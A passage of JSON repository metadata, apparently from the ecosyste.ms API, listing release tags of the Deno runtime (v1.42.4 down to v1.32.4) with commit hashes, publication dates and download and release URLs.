releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id